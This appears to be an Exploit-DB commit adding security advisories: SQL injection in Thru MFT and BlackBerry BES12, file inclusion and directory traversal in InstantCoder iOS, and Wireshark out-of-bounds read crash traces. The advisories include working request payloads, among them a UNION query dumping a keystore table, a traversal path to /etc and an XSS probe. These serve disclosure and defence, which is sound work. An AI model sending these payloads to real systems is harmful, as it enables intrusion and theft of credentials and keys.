DB: 2016-02-23

7 new exploits
This commit is contained in:
Offensive Security 2016-02-23 05:02:07 +00:00
parent 897e728c20
commit f7b6199767
8 changed files with 970 additions and 0 deletions

View file

@ -33631,6 +33631,7 @@ id,file,description,date,author,platform,type,port
37266,platforms/php/webapps/37266.txt,"ClickHeat <= 1.14 Change Admin Password CSRF",2015-06-12,"David Shanahan",php,webapps,80
37249,platforms/linux/dos/37249.py,"Libmimedir VCF Memory Corruption PoC",2015-06-10,"Jeremy Brown",linux,dos,0
37250,platforms/xml/webapps/37250.txt,"HP WebInspect <= 10.4 XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0
39479,platforms/ios/webapps/39479.txt,"InstantCoder 1.0 iOS - Multiple Vulnerabilities",2016-02-22,Vulnerability-Lab,ios,webapps,0
37298,platforms/hardware/webapps/37298.txt,"Apexis IP CAM - Information Disclosure",2015-06-16,"Sunplace Solutions",hardware,webapps,80
37299,platforms/windows/dos/37299.py,"XtMediaPlayer 0.93 (.wav) - Crash PoC",2015-06-16,"SATHISH ARTHAR",windows,dos,0
37300,platforms/windows/dos/37300.py,"FinePlayer 2.20 (.mp4) - Crash PoC",2015-06-16,"SATHISH ARTHAR",windows,dos,0
@ -35716,3 +35717,9 @@ id,file,description,date,author,platform,type,port
39476,platforms/multiple/dos/39476.txt,"Adobe Flash - SimpleButton Creation Type Confusion",2016-02-19,"Google Security Research",multiple,dos,0
39477,platforms/windows/webapps/39477.txt,"ManageEngine Firewall Analyzer 8.5 - Multiple Vulnerabilities",2016-02-19,"Sachin Wagh",windows,webapps,8500
39478,platforms/php/webapps/39478.txt,"SOLIDserver <=5.0.4 - Local File Inclusion Vulnerability",2016-02-20,"Saeed reza Zamanian",php,webapps,0
39480,platforms/windows/local/39480.py,"Core FTP Server 1.2 - Buffer Overflow PoC",2016-02-22,INSECT.B,windows,local,0
39481,platforms/java/webapps/39481.txt,"BlackBerry Enterprise Service < 12.4 (BES12) Self-Service - Multiple Vulnerabilities",2016-02-22,Security-Assessment.com,java,webapps,0
39482,platforms/multiple/dos/39482.txt,"Wireshark - dissect_oml_attrs Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos,0
39483,platforms/multiple/dos/39483.txt,"Wireshark - add_ff_vht_compressed_beamforming_report Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos,0
39484,platforms/multiple/dos/39484.txt,"Wireshark - dissect_ber_set Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos,0
39485,platforms/asp/webapps/39485.txt,"Thru Managed File Transfer Portal 9.0.2 - SQL Injection",2016-02-22,"SySS GmbH",asp,webapps,80

Can't render this file because it is too large.

126
platforms/asp/webapps/39485.txt Executable file
View file

@ -0,0 +1,126 @@
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Advisory ID: SYSS-2015-056
Product: Thru Managed File Transfer Portal
Manufacturer: Thru
Affected Version(s): 9.0.2
Tested Version(s): 9.0.2
Vulnerability Type: SQL Injection (CWE-89)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2015-10-28
Solution Date: 2016-01-22
Public Disclosure: 2016-02-15
CVE Reference: Not yet assigned
Authors of Advisory: Dr. Erlijn van Genuchten, Danny Österreicher
(SySS GmbH)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
Thru Managed File Transfer Portal is a web based file transfer application.
According to the Thru website [1], the application aims to offload large
file transfer to a single platform, to protect files, to replace FTP
servers and to allow access to files anytime, anywhere.
An SQL injection vulnerability was identified in one of the GET request.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
The SQL injection vulnerability was found in a GET request that causes
contact data to be sorted. At least the attribute values of sortorder
and letterrange are not correctly sanitized and therefore can be abused
to inject arbitrary SQL statements.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
The following HTTP request can be used to show that the SQL statement
causing a delay is executed and results in a 500 server error:
GET /App/asp///contacts.asp?sortorder=1;WAITFOR+DELAY+'0:0:5'--&letterrange=all&fromrec=0&torec=20 HTTP/1.1
Host: [HOST]
Cookie: [COOKIES]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:
The reported security vulnerability has been fixed in a new software
release. Update to the new software version.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclosure Timeline:
2015-10-27: Vulnerability discovered
2015-10-28: Vulnerability reported to manufacturer
2016-01-22: Manufacturer announced update
2016-02-15: Public release of security advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References:
[1] Thru Homepage
http://www.thruinc.com
[2] SySS Security Advisory SYSS-2015-056
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-056.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Credits:
This security vulnerability was found by Dr. Erlijn van Genuchten and
Danny Österreicher of the SySS GmbH.
E-Mail: erlijn.vangenuchten@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Erlijn_vanGenuchten.asc
Key ID: 0xBD96FF2A
Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A
E-Mail: danny.oesterreicher@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Danny_Oesterreicher.asc
Key ID: 0x96029AC7
Key Fingerprint: 0B53 8B52 9B5F 39C9 68F5 18C9 9284 FCEB 9602 9AC7
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer:
The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright:
Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIcBAEBCgAGBQJWwbbpAAoJEAylhje9lv8qAh4P/1yg6xg5xHvvnh2Al1fy/ley
rABwBv9YmcNhNLASrxPOXGBx6rcuCc5zEdOI62PKv4E19VMcjOvwHw5MzfP/4GDu
LAAku71zIn6YCxYF1NKScyqDeBg6OZfHiW6EP/ufhFD+pzu0FySmj2G3/lflloEX
FBNHzNURGakWizxzaNbnnltI3DuxPss3E67crJMHEPtXUw0dVrQAeMtsyc46708z
pWh1JAvNNIlqyyQwyy3EOvQtOIkYd8SMmayla2CUpl0xC5On5GcxkqvaZcqyScR9
s4rxVS8x7akGDGS/F2aFM2zEfCL5DAXVCoRWTyKYqcMYINdZY3xuREcG3iOXVMrp
yRYBg6dgwf3QHRmCrkZLlKx6hibHG13dRykD7LPcO3H+q81Ll4T/6OuHqbHbPjD2
EeOqW+bKDn//TKrsUbwvaM/1hF96T66QLRvUeTGHbMoNjN3fQTTqdBaYHq8ROiD8
Xc1ybVxgxUMKi+3WEvOw5aYF6Q/RN9Z4WN2p88+MLrBRFCh6nHT0jPKZFyxZuooi
b3MI/qPawWO4HfpjvunCdNGo49I34JCcAsi2Um8qzM/aedbUaH1dqj6sZW4j8bA2
WzwXgwnLXQ+wON/tCDz8Q4NfZWbDG2v1anJBOTIgABjLAeuo0nDaBYonyp4lY/Og
4UaL7kboaGGj3mRINLd8
=df2e
-----END PGP SIGNATURE-----

298
platforms/ios/webapps/39479.txt Executable file
View file

@ -0,0 +1,298 @@
Document Title:
===============
InstantCoder v1.0 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1738
Release Date:
=============
2016-02-22
Vulnerability Laboratory ID (VL-ID):
====================================
1738
Common Vulnerability Scoring System:
====================================
7
Product & Service Introduction:
===============================
You are one of the best developers in the world and you would like to code anytime, anywhere. CuteCoder makes it possible
for your to code and debug web apps on your lovely iPhone and iPad.
(Copy of the Homepage: https://itunes.apple.com/ai/app/instantcoder/id1067517686 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered multiple vulnerabilities in the official InstantCoder mobile iOS web-application.
Vulnerability Disclosure Timeline:
==================================
2016-02-22: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Shumin Sun
Product: InstantCoder - iOS (Web-Application) 1.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official InstantCoder v1.0 iOS mobile web-application (wifi).
The file include vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path
commands to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `./toolkit/upload` module. Remote attackers are able to inject own
files with malicious `filename` values in the `file upload` POST method request to compromise the mobile web-application. The local
file/path include execution occcurs in the index file dir listing and sub folders of the wifi interface. The attacker is able to
inject the lfi payload by usage of the wifi interface or local file sync function.
Attackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious
attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST.
The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account.
Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] ./toolkit/upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080/)
1.2
A directory traversal web vulnerability has been discovered in the official InstantCoder v1.0 iOS mobile web-application (wifi).
The vulnerability allows remote attackers to unauthorized access path variables to compromise the web-application or mobile device.
The directory traversal web vulnerability is located in the `path` value of the `listFiles` module. Remote attackers are able to
manipulate the path variable GET or POST method request to compromise the application. The request method to inject the payload is
POST and the request method to execute is GET. The attack vector of the vulnerability is located on the application-side. The path
variable is not encoded or parsed. Thus allows an attacker to inject to unauthorized access the local system or app path.
The security risk of the path traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.0.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application (wifi ui) user account.
Successful exploitation of the path traversal vulnerability results in mobile application compromise or compromise of connected device components.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] ./listFiles
Vulnerable Parameter(s):
[+] path
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080/)
Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by remote attackers with wifi panel access and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Payload
http://localhost:8080/toolkit/index.html./[LOCAL FILE INCLUDE VULNERABILITY!]
PoC: Vulnerable Source
javascript:changePath("./[LOCAL FILE INCLUDE VULNERABILITY!]");
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:8080/toolkit/upload?path= Load Flags[LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[162] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/toolkit/index.html]
Content-Length[819]
Content-Type[multipart/form-data; boundary=---------------------------29343138867419]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------29343138867419
Content-Disposition: form-data; name="path"
-----------------------------29343138867419
Content-Disposition: form-data; name="upload1"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!]"
Content-Type: image/png
-
Status: 200[OK]
GET http://localhost:8080/toolkit/index.html Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[4995] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Header:
Accept-Ranges[bytes]
Content-Length[4995]
Date[Mon, 22 Feb 2016 08:33:04 GMT]
Reference(s):
http://localhost:8080/toolkit/upload
http://localhost:8080/toolkit/index.html
1.2
Thedirectory traversal web vulnerability can be exploited by remote attackers with wifi panel access and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Payload
http://localhost:8080/listFiles?path=./.././../../../../../../../../../../
PoC: Vulnerable Source
<p></p>
<div id="list-file"><a href="javascript:changePath("/.././../../../../../../../../../../etc/%00");">
<div class="folder"><img><iframe></div></a></iframe></div></a></div>
</div>
Status: 200[OK]
POST http://localhost:8080/listFiles?path=/ Load Flags[LOAD_BACKGROUND VALIDATE_ALWAYS LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[162] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/toolkit/index.html]
Connection[keep-alive]
Content-Length[0]
Response Header:
Accept-Ranges[bytes]
Content-Length[162]
Date[Mon, 22 Feb 2016 08:09:34 GMT]
-
Status: 200[OK]
POST http://localhost:8080/listFiles?path=/.././../../../../../../../../../../etc/%00 Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/toolkit/index.html]
Connection[keep-alive]
Content-Length[0]
Response Header:
Accept-Ranges[bytes]
Content-Length[2]
Date[Mon, 22 Feb 2016 08:09:37 GMT]
-
Status: 200[OK]
POST http://localhost:8080/listFiles?path=./.././../../../../../../../../../../ Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/toolkit/index.html]
Connection[keep-alive]
Content-Length[0]
Response Header:
Accept-Ranges[bytes]
Content-Length[2]
Date[Mon, 22 Feb 2016 08:09:45 GMT]
Reference(s):
http://localhost:8080/listFiles
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability in the upload POST method request is estimated as high. (CVSS 6.7)
1.2
The security risk of the directory traversal web vulnerability in the list path GET method request is estimated as high. (CVSS 7.0)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (research@vulnerability-lab.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

149
platforms/java/webapps/39481.txt Executable file
View file

@ -0,0 +1,149 @@
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
BlackBerry Enterprise Service 12 (BES12) Self-Service
Affected versions: BES12 < 12.4
CVE: CVE-2016-1914 and CVE-2016-1915
PDF:
http://security-assessment.com/files/documents/advisory/Blackberry%20BES12%20Self-Service%20Multiple%20Vulnerabilities.pdf
+-----------+
|Description|
+-----------+
Blackberry BES12 is an enterprise mobile management solution and
contains a self-service web application available to mobile users. This
web application contains multiple vulnerabilities including
unauthenticated SQL
injection and reflected cross site scripting.
Limited access to an on-premise BES12 environment was provided during
the discovery of these vulnerabilities. The full impact of the
vulnerabilities in relation to compromising other portions of the BES12
solution, such as mobile devices, is unclear.
+------------+
|Exploitation|
+------------+
*SQL Injection*
The Java servlet com.rim.mdm.ui.server.ImageServlet is vulnerable to SQL
injection via the imageName parameter. This servlet is exposed at
multiple paths and is used to fetch an image from the database:
/mydevice/client/image
/admin/client/image
/myapps/client/image
/ssam/client/image
/all/client/image
This was discovered on a production BES12 on-premise deployment and the
injection vector allowed both UNION and stacked queries to be executed
on the Microsoft SQL server used by BES12. This allows full read/write
access to the database, and can potentially result in command execution
via xp_cmdshell depending on the database user configuration.
The following proof of concept demonstrates an injection payload which
will select the entire obj_keystore_entry table. The query will
serialise the entire table into an XML document which is returned in the
HTTP response as UTF-16 without the leading BOM (byte order mark)
causing most text editors to fail to display the response correctly.
https://<server>/mydevice/client/image?imageName=ui.cobranded.login.logo'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,(SELECT+*+FROM+obj_keystore_entry+FOR+XML+PATH(''))+--
The technique above can be used to download any database table available
to the BES12 database user.
Notable database tables are:
* obj_user which contains BES12 user details.
* obj_user_authentication which contains authentication tokens.
* obj_user_device which based on column names, contains enrolment
tokens, enrolment secrets and device encryption keys.
It is unclear if this information is sufficient to decrypt a lost/stolen
BES12 mobile device.
*Reflected Cross Site Scripting*
Two areas of the self-service web application exist where user-supplied
input is reflected directly in web pages, allowing a malicious user to
conduct Cross Site Scripting (XSS) attacks against users of the
application. While the application uses the HttpOnly cookie flag for
session tokens, successful exploitation allows malicious JavaScript to
perform any action within the application that the targeted user is able
to. The administrative web application is typically hosted on the same
domain and may be attacked using these XSS vectors, although this is
BES12 deployment specific.
The table below details where Cross Site Scripting was detected and
which parameters are vulnerable:
https://<server>/mydevice/index.jsp?locale="><script>alert(1)</script>
https://<server>/mydevice/loggedOut.jsp?locale="><script>alert(1)</script>
+----------+
| Solution |
+----------+
Upgrade to BES12.4.
+-------------------+
|Disclosure Timeline|
+-------------------+
Initial disclosure to Blackberry 19 Nov 2015
Disclosure receipt confirmed by Blackberry 19 Nov 2015
Request for update from Blackberry 7 Dec 2015
Vulnerabilities confirmed by Blackberry 8 Dec 2015
Blackberry confirms fixes will be released as part of BES12.4 28 Jan 2016
BES12.4 released 29 Jan 2016
Advisory released 15 Feb 2016
+-----------------------------+
|About Security-Assessment.com|
+-----------------------------+
Security-Assessment.com is a leading team of Information Security
consultants specialising in providing high quality Information Security
services to clients throughout the Asia Pacific region. Our clients
include some of the largest globally recognised companies in areas such
as finance, telecommunications, broadcasting, legal and government. Our
aim is to provide the very best independent advice and a high level of
technical expertise while creating long and lasting professional
relationships with our clients.
Security-Assessment.com is committed to security research and
development, and its team continues to identify and responsibly publish
vulnerabilities in public and private software vendor's products.
Members of the Security-Assessment.com R&D team are globally recognised
through their release of whitepapers and presentations related to new
security research.
For further information on this issue or any of our service offerings,
contact us:
Web www.security-assessment.com
Email info@security-assessment.com

View file

@ -0,0 +1,98 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=656
The following crash due to an out-of-bounds read from static memory can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==5092==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f72db15e078 at pc 0x7f72cffb364f bp 0x7ffe98a8b690 sp 0x7ffe98a8b688
READ of size 4 at 0x7f72db15e078 thread T0
#0 0x7f72cffb364e in dissect_oml_attrs wireshark/epan/dissectors/packet-gsm_abis_oml.c:1544:17
#1 0x7f72cffb3286 in dissect_oml_fom wireshark/epan/dissectors/packet-gsm_abis_oml.c:1799:11
#2 0x7f72cffb2cbe in dissect_abis_oml wireshark/epan/dissectors/packet-gsm_abis_oml.c:1861:13
#3 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#4 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#5 0x7f72cf11e2be in call_dissector_only wireshark/epan/packet.c:2662:8
#6 0x7f72cf10fccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#7 0x7f72cf11e344 in call_dissector wireshark/epan/packet.c:2692:9
#8 0x7f72cffc53b7 in dissect_ipa wireshark/epan/dissectors/packet-gsm_ipa.c:333:5
#9 0x7f72cffc4dab in dissect_ipa_tcp wireshark/epan/dissectors/packet-gsm_ipa.c:376:2
#10 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#11 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#12 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#13 0x7f72d10c59dd in decode_tcp_ports wireshark/epan/dissectors/packet-tcp.c:4615:9
#14 0x7f72d10cb043 in process_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4668:13
#15 0x7f72d10c639c in dissect_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4743:9
#16 0x7f72d10db7a3 in dissect_tcp wireshark/epan/dissectors/packet-tcp.c:5575:13
#17 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#18 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#19 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#20 0x7f72d022188b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
#21 0x7f72d022c2b9 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
#22 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#23 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#24 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#25 0x7f72cf114964 in dissector_try_uint wireshark/epan/packet.c:1174:9
#26 0x7f72cfd3348d in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
#27 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#28 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#29 0x7f72cf11e2be in call_dissector_only wireshark/epan/packet.c:2662:8
#30 0x7f72cf10fccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#31 0x7f72cfd2f725 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
#32 0x7f72cfd27f33 in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
#33 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#34 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#35 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#36 0x7f72cfe235f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#37 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#38 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#39 0x7f72cf11e2be in call_dissector_only wireshark/epan/packet.c:2662:8
#40 0x7f72cf10fccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#41 0x7f72cf10f33b in dissect_record wireshark/epan/packet.c:501:3
#42 0x7f72cf0bd3c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#43 0x5264eb in process_packet wireshark/tshark.c:3728:5
#44 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#45 0x515daf in main wireshark/tshark.c:2197:13
0x7f72db15e078 is located 0 bytes to the right of global variable 'nm_att_tlvdef_base' defined in 'packet-gsm_abis_oml.c:1356:30' (0x7f72db15d880) of size 2040
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-gsm_abis_oml.c:1544:17 in dissect_oml_attrs
Shadow bytes around the buggy address:
0x0feedb623bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0feedb623bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0feedb623bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0feedb623be0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0feedb623bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0feedb623c00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[f9]
0x0feedb623c10: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0feedb623c20: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0feedb623c30: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0feedb623c40: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
0x0feedb623c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==5092==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11825. Attached are three files which trigger the crash.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39482.zip

View file

@ -0,0 +1,74 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=654
The following crash due to an out-of-bounds read from static memory can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==32475==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7fd688698b10 at pc 0x7fd685351320 bp 0x7ffd862371a0 sp 0x7ffd86237198
READ of size 4 at 0x7fd688698b10 thread T0
#0 0x7fd68535131f in add_ff_vht_compressed_beamforming_report wireshark/epan/dissectors/packet-ieee80211.c:9143:8
#1 0x7fd68534746f in add_ff_action_vht wireshark/epan/dissectors/packet-ieee80211.c:9199:16
#2 0x7fd68533f813 in add_ff_action wireshark/epan/dissectors/packet-ieee80211.c:9426:12
#3 0x7fd685324811 in add_fixed_field wireshark/epan/dissectors/packet-ieee80211.c:9566:14
#4 0x7fd68536ebae in dissect_ieee80211_mgt wireshark/epan/dissectors/packet-ieee80211.c:16388:17
#5 0x7fd685368cce in dissect_ieee80211_common wireshark/epan/dissectors/packet-ieee80211.c:18218:7
#6 0x7fd685338dae in dissect_ieee80211 wireshark/epan/dissectors/packet-ieee80211.c:18375:10
